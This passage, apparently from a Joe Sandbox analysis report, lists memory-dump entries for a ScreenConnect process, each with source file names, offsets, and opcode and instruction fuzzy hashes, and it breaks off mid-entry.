                                                                                  • Source File: 00000008.00000002.2590479740.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_fbd000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20bf5fe064ab7b0d580b00a103385434fadff74830f2db618f1fe73aef6710f3
                                                                                  • Instruction ID: 929dac386070873ac999159ec16e034eb3b5adb8f07591898bafafd1bd29b8b6
                                                                                  • Opcode Fuzzy Hash: 20bf5fe064ab7b0d580b00a103385434fadff74830f2db618f1fe73aef6710f3
                                                                                  • Instruction Fuzzy Hash: 592137B6904244DFCB05DF14D9C0BA6BF66FB98320F34C169E8090B256D736D816EFA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 151ad926d1999c892756b664c7b4b31625aea7da1e14d70ec83d86cf1e2dc6c5
                                                                                  • Instruction ID: 76b0b387ec6ebe09597e03eb00ca0dfcf276f3bc48412bd2b987e8493666d439
                                                                                  • Opcode Fuzzy Hash: 151ad926d1999c892756b664c7b4b31625aea7da1e14d70ec83d86cf1e2dc6c5
                                                                                  • Instruction Fuzzy Hash: 3131E0B690020CEFDF10CF99D884ADEBBF5EB48314F10842AE919A7311D775A955CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b20004e1409cc5bbe71196f989a814636ed655e71ff7774bdb964c3189ca7179
                                                                                  • Instruction ID: ec361febdf4d9b6ebcbc4bb81d1ccf9f8e300e47f37710d0bf1d0379bbcbab8c
                                                                                  • Opcode Fuzzy Hash: b20004e1409cc5bbe71196f989a814636ed655e71ff7774bdb964c3189ca7179
                                                                                  • Instruction Fuzzy Hash: 5921F830B002198FDB14DF69C558AAEBBF6EF89355F148469E446E73A0EF71ED018B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10d65e783d668335a285d4e84c6baee987c9f42868f8318dda5aebba9a2663ad
                                                                                  • Instruction ID: dc50a05e3a661506c9568fa76582df535288c4af662891c8f21f209611948dc3
                                                                                  • Opcode Fuzzy Hash: 10d65e783d668335a285d4e84c6baee987c9f42868f8318dda5aebba9a2663ad
                                                                                  • Instruction Fuzzy Hash: 64311674A102188FCB55DF68D854A9DB7F6FF89311F5085AAE409EB360EB31AE81CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf52ca18af398d01a76eb2d363d4c0fd5cc75f96fbddd63d7cfa208eaa751096
                                                                                  • Instruction ID: 164a2e0976361e06efd6ca3ed2bb98105686ad2da775c8597bf713d3a04e608b
                                                                                  • Opcode Fuzzy Hash: cf52ca18af398d01a76eb2d363d4c0fd5cc75f96fbddd63d7cfa208eaa751096
                                                                                  • Instruction Fuzzy Hash: FD31FFB690020CDFDB14CF99D884ADEBBF6EB48314F10801AE929A7211D775A915CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8a9ab303656e73dbe04eb90062fc940e8ecf1658abd60b5b593689544c783e4d
                                                                                  • Instruction ID: 08d7648f1760758449484150b0b03b0ab48320ed1233e5e03b6f5d44e540f5f8
                                                                                  • Opcode Fuzzy Hash: 8a9ab303656e73dbe04eb90062fc940e8ecf1658abd60b5b593689544c783e4d
                                                                                  • Instruction Fuzzy Hash: 53213830B042558FDB14DF68C5946AEFBF6AB8D351F14846AE846EB3A1EB71EC01CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6fb8d1a8b4c62626a756a272a66fec54eda235f7949eb2ab62e692607e6069b0
                                                                                  • Instruction ID: 9b8f4afae9cfbe2c8b6305368bc2fb196612ac090d609b8e9703839ae2088cf1
                                                                                  • Opcode Fuzzy Hash: 6fb8d1a8b4c62626a756a272a66fec54eda235f7949eb2ab62e692607e6069b0
                                                                                  • Instruction Fuzzy Hash: F82160766006019FCB14DF55C990999BBB2FF48320F658499F806BB395EB31FC42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d401d9434d09d9ee275f11169908a3221f89dd202c60c4b6af88606eefbc5007
                                                                                  • Instruction ID: 3e2fa8d09bae999e4967270b1079bba93f76a5408435fd6b485a887b6d48fadf
                                                                                  • Opcode Fuzzy Hash: d401d9434d09d9ee275f11169908a3221f89dd202c60c4b6af88606eefbc5007
                                                                                  • Instruction Fuzzy Hash: 012130366006059FCB14DF59C990999BBB2FF48320F668499E846BB395EB31FC41CBD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f84f4d137a1304d38a3edbb43b1de0764da120307f7d0c4f7f6ac2594613930e
                                                                                  • Instruction ID: 5a0b3c20cba802a6a30db0c91655aefac33c987c2a5cdce3b90262ee73b75944
                                                                                  • Opcode Fuzzy Hash: f84f4d137a1304d38a3edbb43b1de0764da120307f7d0c4f7f6ac2594613930e
                                                                                  • Instruction Fuzzy Hash: F511AF32E10B1AAACB10ABB8D8404EAF374FF95350F00C72AE95577110FB70A69587C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f0d99bcba67a171e7a3f868790e94c065d0ba5b123cfc6d3f5eaf0773fa31dd6
                                                                                  • Instruction ID: cdb8e84e1f63f64c5af64d041a27c2ecbd3d65a9b03a07eb7ee791aaac0dadb6
                                                                                  • Opcode Fuzzy Hash: f0d99bcba67a171e7a3f868790e94c065d0ba5b123cfc6d3f5eaf0773fa31dd6
                                                                                  • Instruction Fuzzy Hash: 8B119331A403466FE7059B25EC51AEF77A1EF84304B148929F1059B255DFB1E9068BD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c4cc993a8c92af23ddce750d23d385955064c310e23e464416416b6c7368bd7a
                                                                                  • Instruction ID: 644050e18d7044a45206c9138d05cfe060d80636572ada4831847392c4009fbd
                                                                                  • Opcode Fuzzy Hash: c4cc993a8c92af23ddce750d23d385955064c310e23e464416416b6c7368bd7a
                                                                                  • Instruction Fuzzy Hash: 481151B1A0451A9F9B05DF69CC448AABBFAFF893247108765E039D77A1E730ED01CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6fbe9a87ff66c8f90d58cd231f095bcffba6489ef5e95d1591991d544529e22
                                                                                  • Instruction ID: 19d689e824ef7508ea1a5e6a19880c9cbcda9829d14669c77860c3e9ea003be4
                                                                                  • Opcode Fuzzy Hash: a6fbe9a87ff66c8f90d58cd231f095bcffba6489ef5e95d1591991d544529e22
                                                                                  • Instruction Fuzzy Hash: 811102B59082819FD702DB3E9C408E6BBB5EF4622830186BBE014C71A3F720A906C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 494952f8c4d18481f0a3be7d987d27ee4cb2b042a6f0613d263732b7ea9b787b
                                                                                  • Instruction ID: 6827be853c35f13c3dff872ac4f1a46f040cbbb4999e1ead8df744de5808a1c5
                                                                                  • Opcode Fuzzy Hash: 494952f8c4d18481f0a3be7d987d27ee4cb2b042a6f0613d263732b7ea9b787b
                                                                                  • Instruction Fuzzy Hash: 202136B5C00259CFDB10CFAAD4847EEFBF4EB48320F15842AE819A7240D738A545CFA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1d410524fdd839814e8b58a01db72e3f4c137a63c476f715dc8c728cc5f3558
                                                                                  • Instruction ID: 95bac705ec40185992e5e5329625cb00c68200b2d4a9340325f9a849b55659d1
                                                                                  • Opcode Fuzzy Hash: a1d410524fdd839814e8b58a01db72e3f4c137a63c476f715dc8c728cc5f3558
                                                                                  • Instruction Fuzzy Hash: 6D11A3322001096F9700DF99DC4099FBBA6EF84324710852AF619D7324EB32E9168BD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00b4d812172711784472288cafc5c0e5204b23ea909d0eb62e511d8736399ae2
                                                                                  • Instruction ID: 6771cd9a7766d478ec78e81fb94c4add726520134bf4b0e29452d0c124642a90
                                                                                  • Opcode Fuzzy Hash: 00b4d812172711784472288cafc5c0e5204b23ea909d0eb62e511d8736399ae2
                                                                                  • Instruction Fuzzy Hash: 732117B1C002599FDB10CFAAD444BEEFBF4EB48320F14842AE858A7240D778A545CFA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2590479740.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_fbd000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                  • Instruction ID: 4685fc60f96e6c5fe159a0d19123369e3ea8f28eb40fd7dc1021e0a5703d0f83
                                                                                  • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                  • Instruction Fuzzy Hash: ED11A276904280CFCB16CF10D5C4B56BF61FB94324F24C5A9D8090B256D336D85ADF92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ba360f9c838f5801e2670700185ce88934a9941dc926040f5a2a390dda2f1079
                                                                                  • Instruction ID: bf4cdc8c750c2deaba0ac97bd69d21b66c7f85b715189366a1a2d7cc2e6aee1f
                                                                                  • Opcode Fuzzy Hash: ba360f9c838f5801e2670700185ce88934a9941dc926040f5a2a390dda2f1079
                                                                                  • Instruction Fuzzy Hash: 2501C4723442056F9704DB69DC5099FBBA5EFC4364310C93AF619DB214EE32E9068BE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c835fb12a3bef6e1f0ba7cf42c8be8738ac14481526dbed5f3a536ed23662a31
                                                                                  • Instruction ID: c7981a148def3a756c4d1e8937cecb6d4f5b865689e1d9da8d52ff699f09c95b
                                                                                  • Opcode Fuzzy Hash: c835fb12a3bef6e1f0ba7cf42c8be8738ac14481526dbed5f3a536ed23662a31
                                                                                  • Instruction Fuzzy Hash: B31100B1C002498FCB10CFAAD9446DEFBF4EB48320F15846AE468A7240D378A945CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c523d422886b0a9a6fbcba63ac08357a3ae925201092e411443fb738760bab65
                                                                                  • Instruction ID: d0065dc773106fa40b5977f6a7c65e8a87db80745ec9da0e4c0731530909a909
                                                                                  • Opcode Fuzzy Hash: c523d422886b0a9a6fbcba63ac08357a3ae925201092e411443fb738760bab65
                                                                                  • Instruction Fuzzy Hash: 71111FB1C003098FCB10CFAAD844ADEFBF4EB48320F10842AE428B3240D378A945CFA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca3f00fe3d8f67ef87a37d2ba982f73e20601860ac93b61e0791c148cdf06a2
                                                                                  • Instruction ID: c649a157aebd0b463563821c743da906c66a31823dbc4a62f8acfd99490a286b
                                                                                  • Opcode Fuzzy Hash: 0ca3f00fe3d8f67ef87a37d2ba982f73e20601860ac93b61e0791c148cdf06a2
                                                                                  • Instruction Fuzzy Hash: FF01D671D143489FDB119F68D8006DDFFB5EF8A310F0442AAE44577250EBB15A89CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2590479740.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_fbd000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 055a3e4b4ed6188753a7e9b0d14ec6fd81535f918b9b4a1f39f4df533f91ca06
                                                                                  • Instruction ID: 2be1fdd8c3418bab89406038dbd7f5aa9d5d0ea3dfbd285473110711c7da4b79
                                                                                  • Opcode Fuzzy Hash: 055a3e4b4ed6188753a7e9b0d14ec6fd81535f918b9b4a1f39f4df533f91ca06
                                                                                  • Instruction Fuzzy Hash: D1012B714043009AD7209B27CC84BA7BF98EF413B0F18C419ED494B18ED3799801EEB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2590479740.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_fbd000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99af7f2c9ba9ca1e3de8dee23e7a3412093a199a185b8bc35098f4f590654346
                                                                                  • Instruction ID: fd6e5d49bc000e8c2628b2b3a8d19d9bf6272a227824c833929980e084d8f3b2
                                                                                  • Opcode Fuzzy Hash: 99af7f2c9ba9ca1e3de8dee23e7a3412093a199a185b8bc35098f4f590654346
                                                                                  • Instruction Fuzzy Hash: 5B018C6140E3C09ED7128B258894B62BFB4EF53224F0D84DBD9888F1A7D2699808DB72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d86da554881a81d917153bd2447cd88a96a2d9a7e70e3144b6c520ea35d81afa
                                                                                  • Instruction ID: 0d1bab801925a6fddf04f6d5a39e803db3cd2fa4752f753fdb0c80e1928c4e98
                                                                                  • Opcode Fuzzy Hash: d86da554881a81d917153bd2447cd88a96a2d9a7e70e3144b6c520ea35d81afa
                                                                                  • Instruction Fuzzy Hash: 2FF0D67238010527E304AB69E98058AFB51EFC1364740C63AE30DDB625EE31AD0687D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6578be441a3639bb06d76fa171bb96590b11ed705b9e78741e9034a9fabb0fd1
                                                                                  • Instruction ID: ca59797181d6c4ffd02330c5fec17667ae77ed7337b7a1dcf610cab473b92ae7
                                                                                  • Opcode Fuzzy Hash: 6578be441a3639bb06d76fa171bb96590b11ed705b9e78741e9034a9fabb0fd1
                                                                                  • Instruction Fuzzy Hash: FA01F97120C3846FC702CB65DC608AA7FB5EF8626030584ABF449CB162E635ED06C770
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48d5a157f8e447710c790ce51d76026a17f039988b619916cc3973053f7224d5
                                                                                  • Instruction ID: 860bcdd479ad6a18eb3ea61e5263afb4a4009f3bbf2d1aba1d20198feb82079a
                                                                                  • Opcode Fuzzy Hash: 48d5a157f8e447710c790ce51d76026a17f039988b619916cc3973053f7224d5
                                                                                  • Instruction Fuzzy Hash: EF015B30B80206CFDB14DFA4D8A46AE77A2BF88345F108929E80697354EF74A906CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b32d2e2cdc2ce7e621f3d23a785b8b506aec234aab5058455b6147555b1f6dfd
                                                                                  • Instruction ID: c9a418bc295eb4a5b50a25cff3a2f03a0acc54be08dae370ee3b6663c8d0e446
                                                                                  • Opcode Fuzzy Hash: b32d2e2cdc2ce7e621f3d23a785b8b506aec234aab5058455b6147555b1f6dfd
                                                                                  • Instruction Fuzzy Hash: C3F022327010188FD7259B29EE142EEBBB6EFC9350F004576E609EB281DF34AD468B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca8943a114e0309cc3ad619f42f6e73de735e911605c80904b9a81cdf286f7b
                                                                                  • Instruction ID: 225eeb54926f4b938c0db4c6a0fe135e89770873c1bc680bd1de91545260eddb
                                                                                  • Opcode Fuzzy Hash: 0ca8943a114e0309cc3ad619f42f6e73de735e911605c80904b9a81cdf286f7b
                                                                                  • Instruction Fuzzy Hash: 1EF0FC7220410A9FDB05CF98DC509AF7BB6EF88354B04843BFA09C7225DB31D916CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e4d1367ea943d4405eb65c25e6fdbe1c97aabd4565d728e91b01a78175a97dfb
                                                                                  • Instruction ID: 075184889c0db389bc4c17de36d169c4d921582fb913c810c02bb0c7425ee0b2
                                                                                  • Opcode Fuzzy Hash: e4d1367ea943d4405eb65c25e6fdbe1c97aabd4565d728e91b01a78175a97dfb
                                                                                  • Instruction Fuzzy Hash: 93F096753102049FC704DBA8E484A5E77F6EF883A57108639F509CB364EB71ED05CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1fb9b3395dcaba7b6c3072a7ade21d0c36e8d8047aaff6891f28fc38350b2179
                                                                                  • Instruction ID: f100e724fba6a12c1050ac4f6e7f921d96aeb7c9f212dc12abb625537d1d13c3
                                                                                  • Opcode Fuzzy Hash: 1fb9b3395dcaba7b6c3072a7ade21d0c36e8d8047aaff6891f28fc38350b2179
                                                                                  • Instruction Fuzzy Hash: 53F05E713002046F8710DAADE884D5FBBE9DF897A4350863AF509CB354EB71ED0587A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e69da21f284e2e2ccf104f59a8f81d5b9ef7ceaae60743500c17e5b9b04d573
                                                                                  • Instruction ID: bf90f2f36473fd926d4deb1f9e8b599d3dc8c7bb09516d4fdfc4a9abffba6667
                                                                                  • Opcode Fuzzy Hash: 1e69da21f284e2e2ccf104f59a8f81d5b9ef7ceaae60743500c17e5b9b04d573
                                                                                  • Instruction Fuzzy Hash: C7E02B33B003145FCB14DBB9AC045EE7B9BEB80271B004069F409D3784EE319D0187C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9cea8f631a03fdd659e434dfeea677ce844f12a8240626ade881a48571b528b2
                                                                                  • Instruction ID: 33bdaa1d8701692962deff8fb84976d306d4b4260514a69e0e8d247e13d8312e
                                                                                  • Opcode Fuzzy Hash: 9cea8f631a03fdd659e434dfeea677ce844f12a8240626ade881a48571b528b2
                                                                                  • Instruction Fuzzy Hash: 35F02B32B052145FDB04DBB45C442DE7F66DB402A0F0084A9E544DB785EE384D4AC3D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 123d31f8d48387d4428ad234fa2b6a3b80b9d5e06a5760f4e1a96558fd982c9d
                                                                                  • Instruction ID: 8fad4ef63529dc12aab3e37c54d271504f5d0620ec818220ccb4c33c1635c4de
                                                                                  • Opcode Fuzzy Hash: 123d31f8d48387d4428ad234fa2b6a3b80b9d5e06a5760f4e1a96558fd982c9d
                                                                                  • Instruction Fuzzy Hash: 5FF01735E102198FCB00DFA8D948ADCBBB1FF89311F1042A6E009AB220EB716A95DF41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3757398fa7f2bf64d711ede4390bdc7aeadb20ed458eb9fbd7adb3a24cd282d
                                                                                  • Instruction ID: 1cc05be1005b00c222dc8320f5ceaf93d58055da19e576cbc08215489f6b99d1
                                                                                  • Opcode Fuzzy Hash: e3757398fa7f2bf64d711ede4390bdc7aeadb20ed458eb9fbd7adb3a24cd282d
                                                                                  • Instruction Fuzzy Hash: B9E0922420E3C38FD707862954603A1BFA16F46108F2885FAD588CF253E611D80A8391
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21242431a41157fbc46fcd2eb36f8876219042511ad6dc03b96fa7d2b2762b18
                                                                                  • Instruction ID: 812ce9d9f4d9b0814b9177176fefcb60cef37d94c46b926b892e007591fa6f72
